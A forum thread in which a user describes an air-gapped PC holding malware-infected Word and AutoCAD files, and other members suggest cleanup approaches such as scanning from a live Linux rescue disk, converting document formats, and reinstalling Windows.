Need my cloud scrubbed of malware

[estwing]

I always felt guilty about dropping this thread, I lost my login details.

I'm back....Hello!

I still have 60gb of infected files, they sit on a standalone PC that doesn't have bluetooth or wifi, it doesn't have the electronic parts inside it to do bluetooth or wifi, so it cant spread it's nastiness and I pull the power cord when it's not in use.

I do occasionally need files from it, which I scrub first, then email them to myself via a router with a SIM card in it, this PC is not allowed on my network and thumb drives are a big no.

The main infected files are word.docs and AutoCAD files, they open up a connection with an ip address, some kind of collaboration thing, so a team can all work on a project together. Virus checkers such as mcafee, bitdefender, etc, see this as normal and don't report it. I don't bother looking for trojans or viruses in other files anymore, I know they are there, I can't do anything about them. Turning off macros and winding all the security settings to maximum, didn't stop this from happening.

Once a word.doc or CAD file had made a connection, a VM would be installed on my machine to run under or alongside windows, I couldn't see it or find it. From there the PC would be controlled by someone else, with an overlay of windows installed, it all looked normal to me.

I have been free of all this for over two years now, this was a very expensive, prolonged and traumatic time in my life.

 

[stugster]

Are you not retired yet?

 

[estwing]

Are you not retired yet?

Kinda, I spend a lot of time playing tennis, I'm not as keen on this work malarky as I used to be.

Hello fella, how's things?

 

[stugster]

Not bad! Where are we now?

circa 30 person head count
>£3m turnover
3 floor office in Edinburgh, small satellite offices in London, Glasgow, and Austin, Texas.
Certified to our tits: ISO 27001, ISO 14001, ISO 9001, ISO 22301, ISO 20000-1. CREST Accredited for Penetration Testing and Vulnerability Scanning. NCSC Assured Service Provider, IASME Certifying Body for Cyber Essentials (and Plus).
Certified B-Corp!

 

[KM-Tiger]

circa 30 person head count
>£3m turnover
3 floor office in Edinburgh, small satellite offices in London, Glasgow, and Austin, Texas.
Certified to our tits: ISO 27001, ISO 14001, ISO 9001, ISO 22301, ISO 20000-1. CREST Accredited for Penetration Testing and Vulnerability Scanning. NCSC Assured Service Provider, IASME Certifying Body for Cyber Essentials (and Plus).
Certified B-Corp!

Blimey, well done!

You have come a long way from driving round finding unsecured wireless networks.

 

[stugster]

Blimey, well done!

You have come a long way from driving round finding unsecured wireless networks.

Ha, yeah! Those were the days. I had to pivot slightly when I realised that didn't make money

 

[Andy Inman]

I still have 60gb of infected files, they sit on a standalone PC that doesn't have bluetooth or wifi, it doesn't have the electronic parts inside it to do bluetooth or wifi, so it cant spread it's nastiness and I pull the power cord when it's not in use. [...]

I would say:

1. Boot the PC under Linux -- I don't think I'm able to post links here - search for something like "Remove Windows viruses using a live Linux USB".
2. Running Linux, the files can be accessed safely - Linux can read Windows file systems, but there absolutely no way any Windows cr*p can get executed. So you can safely run virus scan/removal tools.

Looks like I can post links... I found this video https://www.youtube.com/watch?v=Fp86GbNEuKw - looks appropriate from the title, but I haven't actually watched it.
ChatGPT may handle it too, I've not looked.

 

[gpietersz]

@Andy Inman your idea is sound, although i would add that you need the right Live CD - its best if you can find an appropriate one with the right software to remove the malware.

The video you linked to is not helpful. Not only is it about how to keep a Linux system secure, it is also gives terrible advice on how to do that!

 

[Andy Inman]

@gpietersz Good points! Maybe this one: https://ualinux.com/en/download/ubuntu-pack/ualinux-rescue-pack. I guess there will be others.

Also, a way to create a bootable USB stick from a downloaded ISO image, run on a separate Windows machine. I've used Balena Etcher (free) successfully for that, in the past - https://etcher.balena.io/

Probably best overall: take the machine to a local IT company that know their stuff, and pay for the service.

 

[fisicx]

Probably best overall: take the machine to a local IT company that know their stuff, and pay for the service.

Already been done by numerous experts. Didn’t fix the problem.

As the OP said, it seems to be an infected CAD file. But they all pass the malware checks.

 

[gpietersz]

On thing that could work with the word docs is to convert them to a different format (and back) if necessary, and do that on a different OS. I do not know enough about CAD formats to know whether it would work for them.

Then wipe and reinstalled Windows on the PC, and copy the data back.

 

[Andy Inman]

Found https://help.autodesk.com/view/ACD/2026/ENU/?guid=GUID-9C7E997D-28F8-4605-8583-09606610F26D - it appears there's a significant rage of potential attack vectors related to AutoCAD.

Examining the file system from a separate OS is a viable approach. Some kind of rootkit may have been installed to the main OS, which could explain why malware scans don't find anything. A separate OS gets around that.

Given the amount of data involved, "beyond economical repair" seems not unlikely.